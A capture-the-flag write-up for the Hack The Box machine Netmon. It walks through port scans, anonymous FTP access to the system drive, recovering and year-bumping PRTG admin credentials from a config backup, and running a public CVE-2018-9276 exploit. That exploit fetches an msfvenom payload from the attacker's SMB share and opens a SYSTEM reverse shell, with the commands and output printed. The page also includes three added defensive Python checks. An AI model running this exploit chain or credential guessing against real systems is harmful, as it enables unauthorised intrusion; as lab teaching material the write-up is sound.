Netmon

About this machine: HTB

Operating system: Windows

Skills used:

  • PRTG

  • Python

  • FTP

First nmap scan:

nmap -p- --open -sS -T4 -Pn -n 10.10.10.152 -oN First_Scann

PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

Version and script scan:

nmap -p21,80,135,139,445,5985,47001 -n -T4 -sVC 10.10.10.152 -oN sVC_Scann

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-28 13:31 EDT
Nmap scan report for 10.10.10.152
Host is up (0.14s latency).

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_11-10-23  10:20AM       <DIR>          Windows
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2025-05-28T17:31:19
|_  start_date: 2025-05-28T17:20:20

We take a look at what is running on port 80:

(screenshot)

We run whatweb:

whatweb 10.10.10.152

http://10.10.10.152 [302 Found] Country[RESERVED][ZZ], HTTPServer[PRTG/18.1.37.13946], IP[10.10.10.152], PRTG-Network-Monitor[18.1.37.13946,PRTG], RedirectLocation[/index.htm], UncommonHeaders[x-content-type-options], X-XSS-Protection[1; mode=block]
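Both nmap and whatweb read the build straight from the Server header: PRTG/18.1.37.13946. The CVE-2018-9276 description covers PRTG Network Monitor before 18.2.39, so the version string alone is enough to triage a host. The following Python check is an added example written for this page, not code from the writeup or from Paessler: it parses Server header values (from a scan export or an inventory) and flags PRTG builds older than 18.2.39. The sample headers other than the one seen on this box are constructed, and the `fetch_server_header` helper is my own addition that only issues a HEAD request.

```python
import http.client
import re

# CVE-2018-9276 is described as affecting PRTG Network Monitor before 18.2.39,
# so any (major, minor, build) below this tuple is treated as unpatched.
FIXED_VERSION = (18, 2, 39)

# Matches banners such as "PRTG/18.1.37.13946"; the fourth number is a build
# id that the comparison does not need.
BANNER_RE = re.compile(r"PRTG/(\d+)\.(\d+)\.(\d+)(?:\.(\d+))?")


def parse_prtg_version(header_value):
    """Return (major, minor, build) from a PRTG Server header, or None when
    the header does not look like PRTG at all."""
    m = BANNER_RE.search(header_value or "")
    if not m:
        return None
    return tuple(int(x) for x in m.groups()[:3])


def is_before_fix(version, fixed=FIXED_VERSION):
    """Plain tuple comparison works because every component is an integer."""
    return version < fixed


def assess_banner(header_value):
    """Classify one Server header value."""
    version = parse_prtg_version(header_value)
    if version is None:
        return {"prtg": False, "version": None, "needs_update": False}
    return {
        "prtg": True,
        "version": ".".join(str(n) for n in version),
        "needs_update": is_before_fix(version),
    }


def fetch_server_header(host, port=80, timeout=5):
    """Hypothetical helper (not used by the offline demo): read the Server
    header of one of your own hosts with a single HEAD request."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("HEAD", "/")
        return conn.getresponse().getheader("Server")
    finally:
        conn.close()


# Constructed sample inventory: the first value is the one seen on this box,
# the others are made up to exercise the comparison.
SAMPLE_HEADERS = {
    "netmon": "PRTG/18.1.37.13946",
    "constructed-patched": "PRTG/18.2.39.1661",
    "constructed-newer": "PRTG/19.1.49.1966",
    "constructed-other": "Microsoft-HTTPAPI/2.0",
}


def hosts_needing_update(headers=SAMPLE_HEADERS):
    """Names of the hosts whose PRTG build predates the fix, sorted."""
    return sorted(name for name, h in headers.items()
                  if assess_banner(h)["needs_update"])


if __name__ == "__main__":
    for name, header in SAMPLE_HEADERS.items():
        print(name, assess_banner(header))
    print("needs update:", hosts_needing_update())
```

On the sample inventory only the Netmon banner is reported, because 18.1.37 sorts below 18.2.39 while the two constructed newer builds do not.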

FTP allows anonymous access, so we try it:

ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:guerrerove): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49951|)
150 Opening ASCII mode data connection.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
11-10-23  10:20AM       <DIR>          Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49952|)
150 Opening ASCII mode data connection.
02-25-19  11:44PM       <DIR>          Administrator
01-15-24  11:03AM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49953|)
150 Opening ASCII mode data connection.
01-15-24  11:03AM       <DIR>          Desktop
02-03-19  08:05AM       <DIR>          Documents
07-16-16  09:18AM       <DIR>          Downloads
07-16-16  09:18AM       <DIR>          Music
07-16-16  09:18AM       <DIR>          Pictures
07-16-16  09:18AM       <DIR>          Videos
226 Transfer complete.
ftp> cd DEsktop
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49956|)
125 Data connection already open; Transfer starting.
02-03-19  12:18AM                 1195 PRTG Enterprise Console.lnk
02-03-19  12:18AM                 1160 PRTG Network Monitor.lnk
05-28-25  01:21PM                   34 user.txt
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||49964|)
150 Opening ASCII mode data connection.
100% |***********************************************************************************|    34        0.24 KiB/s    00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.23 KiB/s)
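The listing format above is the IIS FTP "MS-DOS style" (`MM-DD-YY HH:MMAM`, then `<DIR>` or a byte size, then the name), and what makes this box interesting is that the anonymous root is the whole system drive. The Python below is an added example written for this page, not part of the original writeup: it parses that listing format into structured entries and reports when enough well-known Windows root directories are visible that the FTP root must be the OS drive. The sample listing is reconstructed from the session above; the threshold of three directory names and the `SYSTEM_ROOT_DIRS` set are my own choices.

```python
import re
from datetime import datetime

# One line of an IIS "MS-DOS style" FTP listing, for example
#   02-03-19  12:18AM                 1024 .rnd
#   02-25-19  10:15PM       <DIR>          inetpub
LISTING_RE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{1,2}:\d{2}[AP]M)\s+"
    r"(?P<kind><DIR>|\d+)\s+(?P<name>.+?)\s*$"
)

# Directories that only appear together at the root of a Windows system drive
# (assumed list, chosen for this example).
SYSTEM_ROOT_DIRS = {
    "Windows", "Users", "Program Files", "Program Files (x86)",
    "PerfLogs", "ProgramData", "inetpub",
}


def parse_listing(text):
    """Parse an MS-DOS style listing into dicts. Lines that are not entries
    (FTP status lines such as '226 Transfer complete.') are skipped."""
    entries = []
    for line in text.splitlines():
        m = LISTING_RE.match(line.strip())
        if not m:
            continue
        is_dir = m.group("kind") == "<DIR>"
        entries.append({
            "name": m.group("name"),
            "is_dir": is_dir,
            "size": 0 if is_dir else int(m.group("kind")),
            "mtime": datetime.strptime(
                f"{m.group('date')} {m.group('time')}", "%m-%d-%y %I:%M%p"
            ),
        })
    return entries


def system_root_exposed(entries, min_hits=3):
    """Return the well-known system directories present in the listing when at
    least min_hits of them are visible, i.e. the FTP root is the OS drive;
    otherwise an empty list."""
    hits = sorted(e["name"] for e in entries
                  if e["is_dir"] and e["name"] in SYSTEM_ROOT_DIRS)
    return hits if len(hits) >= min_hits else []


# Constructed sample: the anonymous root listing from this box plus the
# surrounding FTP status lines a real session prints.
SAMPLE_LISTING = """\
150 Opening ASCII mode data connection.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
11-10-23  10:20AM       <DIR>          Windows
226 Transfer complete.
"""


def audit(text=SAMPLE_LISTING):
    """Summarise one listing: entry counts and any system-root exposure."""
    entries = parse_listing(text)
    return {
        "entries": len(entries),
        "dirs": sum(e["is_dir"] for e in entries),
        "exposed": system_root_exposed(entries),
    }


if __name__ == "__main__":
    report = audit()
    print(report)
    if report["exposed"]:
        print("anonymous FTP root is the system drive; visible:",
              ", ".join(report["exposed"]))
```

A listing of an ordinary share (say, a user's Desktop) yields no hits and an empty `exposed` list, while the root listing from this box trips the check with six of the seven names.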

We download the flag to our machine and read it:

cat user.txt

c4f605dc6538011375f21d0b372c67e3

We look for where the web application stores its data:

ftp> cd /ProgramData
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50491|)
150 Opening ASCII mode data connection.
12-15-21  10:40AM       <DIR>          Corefig
02-03-19  12:15AM       <DIR>          Licenses
11-20-16  10:36PM       <DIR>          Microsoft
02-03-19  12:18AM       <DIR>          Paessler
02-03-19  08:05AM       <DIR>          regid.1991-06.com.microsoft
07-16-16  09:18AM       <DIR>          SoftwareDistribution
02-03-19  12:15AM       <DIR>          TEMP
11-20-16  10:19PM       <DIR>          USOPrivate
11-20-16  10:19PM       <DIR>          USOShared
02-25-19  10:56PM       <DIR>          VMware
226 Transfer complete.

We download the data backup and inspect it in our terminal:

(screenshot)

We have a username and password:

prtgadmin PrTg@dmin2018

We try to log in but it is refused; since this came from an old backup file, we bump the number at the end of the password up by one, to PrTg@dmin2019:

(screenshot)

and we are in:

(screenshot)
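The password that worked differs from the one in the backup only by the year being one higher, which is exactly the kind of rotation a password-change policy should refuse. The Python below is an added example written for this page, not part of the original writeup or of PRTG: it compares an old and a proposed new password and rejects the new one when it is the old one with a single run of digits moved by a small step, everything else unchanged. The `max_step` threshold and all sample pairs except the two values from this box are my own.

```python
import re

# Split a password into alternating digit and non-digit runs, e.g.
# "PrTg@dmin2018" -> ["PrTg@dmin", "2018"]
TOKEN_RE = re.compile(r"\d+|\D+")


def tokenize(password):
    return TOKEN_RE.findall(password)


def is_incremental_rotation(old, new, max_step=5):
    """True when new equals old except for exactly one digit run that moved
    by at most max_step in either direction."""
    old_t, new_t = tokenize(old), tokenize(new)
    if len(old_t) != len(new_t):
        return False
    changed = 0
    for a, b in zip(old_t, new_t):
        if a == b:
            continue
        if not (a.isdigit() and b.isdigit()):
            return False          # a non-digit part changed: not a pure bump
        if abs(int(a) - int(b)) > max_step:
            return False          # digits changed, but by more than a bump
        changed += 1
    return changed == 1


def rotation_verdict(old, new, max_step=5):
    """Return 'identical', 'incremental' or 'ok' for a proposed rotation."""
    if old == new:
        return "identical"
    if is_incremental_rotation(old, new, max_step):
        return "incremental"
    return "ok"


# Constructed sample rotations; only the first pair comes from this box.
SAMPLE_ROTATIONS = [
    ("PrTg@dmin2018", "PrTg@dmin2019"),   # year bumped by one
    ("PrTg@dmin2018", "PrTg@dmin2018"),   # unchanged
    ("PrTg@dmin2018", "PrTg@dmin2030"),   # digits changed by more than a bump
    ("Summer2023!", "Winter2024!"),       # word changed as well
    ("build-v9", "build-v10"),            # bump that changes digit count
]


def audit_rotations(pairs=SAMPLE_ROTATIONS):
    """Evaluate each (old, new) pair and return (old, new, verdict) tuples."""
    return [(old, new, rotation_verdict(old, new)) for old, new in pairs]


if __name__ == "__main__":
    for old, new, verdict in audit_rotations():
        print(f"{old!r} -> {new!r}: {verdict}")
```

Tokenising into digit and non-digit runs, rather than looking only at a trailing number, means a year embedded in the middle of a password (`PrTg@dmin2018!` to `PrTg@dmin2019!`) is caught the same way, and comparing the runs as integers means `v9` to `v10` counts as a bump even though the digit count changed.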

We look for a vulnerability to gain a shell as root:

https://github.com/A1vinSmith/CVE-2018-9276

We will use the exploit from this repository to get a reverse shell; let's take a quick look at its usage:

git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass

We run it:

ls
CVE-2018-9276  'PRTG Configuration.dat'  'PRTG Configuration.old.bak'  prtg20250528.log

cd CVE-2018-9276

ls
exploit.py  LICENSE  README.md

chmod +x exploit.py

./exploit.py -i 10.10.10.152 -p 80 --lhost 10.10.14.11 --lport 443 --user prtgadmin --password PrTg@dmin2019
[+] [PRTG/18.1.37.13946] is Vulnerable!

[*] Exploiting [10.10.10.152:80] as [prtgadmin/PrTg@dmin2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] File staged at [C:\Users\Public\tester.txt] successfully with objid of [2018]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2018] staged for execution
[*] Generate msfvenom payload with [LHOST=10.10.14.11 LPORT=443 OUTPUT=/tmp/eigaplox.dll]
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
/home/guerrerove/HTB/machines/netmon/exploit/CVE-2018-9276/./exploit.py:294: DeprecationWarning: setName() is deprecated, set the name attribute instead
  impacket.setName('Impacket')
/home/guerrerove/HTB/machines/netmon/exploit/CVE-2018-9276/./exploit.py:295: DeprecationWarning: setDaemon() is deprecated, set the daemon attribute instead
  impacket.setDaemon(True)
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Hosting payload at [\\10.10.14.11\XLNLETWF]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Command staged at [C:\Users\Public\tester.txt] successfully with objid of [2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2019] staged for execution
[*] Attempting to kill the impacket thread
[-] Impacket will maintain its own thread for active connections, so you may find it's still listening on :445!
[-] ps aux | grep and kill -9 <pid> if it is still running :)
[-] The connection will eventually time out.

[+] Listening on [10.10.14.11:443 for the reverse shell!]
listening on [any] 443 ...
[*] Incoming connection (10.10.10.152,51114)
[*] AUTHENTICATE_MESSAGE (,NETMON)
[*] User NETMON\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa wh
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.152] 51115
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

We are in; now we look for the last flag:

C:\Windows\system32>cd C://

C:\>dir
 Directory of C:\

02/03/2019  12:18 AM             1,024 .rnd
02/25/2019  10:15 PM    <DIR>          inetpub
07/16/2016  09:18 AM    <DIR>          PerfLogs
02/25/2019  10:56 PM    <DIR>          Program Files
02/03/2019  12:28 AM    <DIR>          Program Files (x86)
02/03/2019  08:08 AM    <DIR>          Users
11/10/2023  10:20 AM    <DIR>          Windows
               1 File(s)          1,024 bytes
               6 Dir(s)   6,741,463,040 bytes free

C:\>cd USers

C:\Users>dir
 Directory of C:\Users

02/03/2019  08:08 AM    <DIR>          .
02/03/2019  08:08 AM    <DIR>          ..
02/25/2019  11:44 PM    <DIR>          Administrator
05/28/2025  02:45 PM    <DIR>          Public
               0 File(s)              0 bytes
               4 Dir(s)   6,741,458,944 bytes free

C:\Users>cd Administrator

C:\Users\Administrator>dir
 Directory of C:\Users\Administrator

02/25/2019  11:58 PM    <DIR>          .
02/25/2019  11:58 PM    <DIR>          ..
02/03/2019  08:08 AM    <DIR>          Contacts
02/03/2019  12:35 AM    <DIR>          Desktop
02/03/2019  08:08 AM    <DIR>          Documents
02/03/2019  08:08 AM    <DIR>          Downloads
02/03/2019  08:08 AM    <DIR>          Favorites
02/03/2019  08:08 AM    <DIR>          Links
02/03/2019  08:08 AM    <DIR>          Music
02/03/2019  08:08 AM    <DIR>          Pictures
02/03/2019  08:08 AM    <DIR>          Saved Games
02/03/2019  08:08 AM    <DIR>          Searches
02/25/2019  11:06 PM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)   6,741,458,944 bytes free

C:\Users\Administrator>cd DEsktop

C:\Users\Administrator\Desktop>dir

02/03/2019  12:35 AM    <DIR>          .
02/03/2019  12:35 AM    <DIR>          ..
05/28/2025  01:21 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,741,458,944 bytes free

C:\Users\Administrator\Desktop>type root.txt
7e69b2ac788996784114ccb4ab576a2e

With the root flag in hand, we call this machine done.
